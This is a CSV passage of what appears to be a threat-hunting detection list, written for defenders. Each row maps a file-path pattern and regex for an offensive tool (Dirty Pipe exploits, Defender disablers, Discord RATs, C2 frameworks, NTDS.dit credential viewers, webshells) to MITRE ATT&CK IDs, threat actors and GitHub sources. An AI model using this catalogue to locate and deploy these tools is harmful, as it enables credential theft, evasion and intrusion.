"*/dicassassin.7z*",".{0,1000}\/dicassassin\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","6571"
"*/dicom-brute.nse*",".{0,1000}\/dicom\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6572"
"*/dicom-ping.nse*",".{0,1000}\/dicom\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6573"
"*/dict-info.nse*",".{0,1000}\/dict\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6574"
"*/dicts/ftp_default.txt*",".{0,1000}\/dicts\/ftp_default\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","6575"
"*/DigitalOceanProxyTab.java*",".{0,1000}\/DigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","1","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","6576"
"*/DInjector.git*",".{0,1000}\/DInjector\.git.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","6577"
"*/DInvoke/*",".{0,1000}\/DInvoke\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","6578"
"*/DInvokeResolver/*",".{0,1000}\/DInvokeResolver\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","6579"
"*/dir_brute.txt*",".{0,1000}\/dir_brute\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","6580"
"*/dirbuster*",".{0,1000}\/dirbuster.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6581"
"*/dirbuster.py*",".{0,1000}\/dirbuster\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","6582"
"*/dirbuster/*",".{0,1000}\/dirbuster\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6583"
"*/DirCreate2System.git*",".{0,1000}\/DirCreate2System\.git.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","6584"
"*/DirCreate2System.git*",".{0,1000}\/DirCreate2System\.git.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","6585"
"*/dirdevil.git*",".{0,1000}\/dirdevil\.git.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","6586"
"*/dirdevil.ps1*",".{0,1000}\/dirdevil\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","6587"
"*/dirdevil_decoder_mini.ps1*",".{0,1000}\/dirdevil_decoder_mini\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","6588"
"*/dirdevil_decoder_only.ps1*",".{0,1000}\/dirdevil_decoder_only\.ps1.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","1","N/A","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","6589"
"*/direct_syscall_amd64.s*",".{0,1000}\/direct_syscall_amd64\.s.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","6590"
"*/dirsearch.py*",".{0,1000}\/dirsearch\.py.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","6591"
"*/DirtyCLR.git*",".{0,1000}\/DirtyCLR\.git.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","1","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","6592"
"*/Dirty-Pipe.sh*",".{0,1000}\/Dirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","N/A","3","280","78","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z","6593"
"*/Dirty-Pipe.sh*",".{0,1000}\/Dirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","6594"
"*/Dirty-Pipe/main/exploit-static*",".{0,1000}\/Dirty\-Pipe\/main\/exploit\-static.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","N/A","1","9","6","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z","6595"
"*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","6596"
"*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","6597"
"*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","6598"
"*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","6599"
"*/dirtypipez-exploit/*",".{0,1000}\/dirtypipez\-exploit\/.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","N/A","1","51","22","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z","6600"
"*/Dirty-Vanity.git*",".{0,1000}\/Dirty\-Vanity\.git.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","1","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","6601"
"*/dis_defender.exe*",".{0,1000}\/dis_defender\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6602"
"*/Disable_defender.py*",".{0,1000}\/Disable_defender\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","6603"
"*/disable-defender.exe*",".{0,1000}\/disable\-defender\.exe.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","1","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","6604"
"*/Disable-TamperProtection.git*",".{0,1000}\/Disable\-TamperProtection\.git.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","1","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","6605"
"*/DisableWD.dll,*",".{0,1000}\/DisableWD\.dll,.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","6606"
"*/Discord rat.exe*",".{0,1000}\/Discord\srat\.exe.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","6607"
"*/DiscordBot.py*",".{0,1000}\/DiscordBot\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","1","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","6608"
"*/discord-c2.git*",".{0,1000}\/discord\-c2\.git.{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","1","N/A","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","6609"
"*/Discord-RAT-2.0*",".{0,1000}\/Discord\-RAT\-2\.0.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","6610"
"*/Discord-RAT-2.0.git*",".{0,1000}\/Discord\-RAT\-2\.0\.git.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","6611"
"*/disctopia.py*",".{0,1000}\/disctopia\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105  -  T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","6612"
"*/disctopia-c2*",".{0,1000}\/disctopia\-c2.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105  -  T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","6613"
"*/DiskCryptor.git*",".{0,1000}\/DiskCryptor\.git.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","6614"
"*/dist/fw_walk.*",".{0,1000}\/dist\/fw_walk\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","6615"
"*/dist:/dist_ext torat*",".{0,1000}\/dist\:\/dist_ext\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","#linux","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","6616"
"*/distcc-cve2004-2687.nse*",".{0,1000}\/distcc\-cve2004\-2687\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6617"
"*/distopia-test*",".{0,1000}\/distopia\-test.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105  -  T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","6618"
"*/DitExplorer.git*",".{0,1000}\/DitExplorer\.git.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6619"
"*/DitExplorer/releases/download/*",".{0,1000}\/DitExplorer\/releases\/download\/.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6620"
"*/DitExplorer/releases/tag/v*",".{0,1000}\/DitExplorer\/releases\/tag\/v.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6621"
"*/DitExplorer/tarball/*",".{0,1000}\/DitExplorer\/tarball\/.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6622"
"*/DitExplorer/zipball/*",".{0,1000}\/DitExplorer\/zipball\/.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","1","N/A","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","6623"
"*/Dive Shell 1.0 - Emperor Hacking Team.php*",".{0,1000}\/Dive\sShell\s1\.0\s\-\sEmperor\sHacking\sTeam\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6624"
"*/DKMC.git*",".{0,1000}\/DKMC\.git.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","6625"
"*/dkmc.py*",".{0,1000}\/dkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","6626"
"*/DLHell.git*",".{0,1000}\/DLHell\.git.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","6627"
"*/DLHell.py*",".{0,1000}\/DLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","6628"
"*/dll/inject/*",".{0,1000}\/dll\/inject\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6629"
"*/dll_inject.exe*",".{0,1000}\/dll_inject\.exe.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","6630"
"*/DLLEnc.ps1*",".{0,1000}\/DLLEnc\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","6631"
"*/dllexploit.cpp*",".{0,1000}\/dllexploit\.cpp.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","6632"
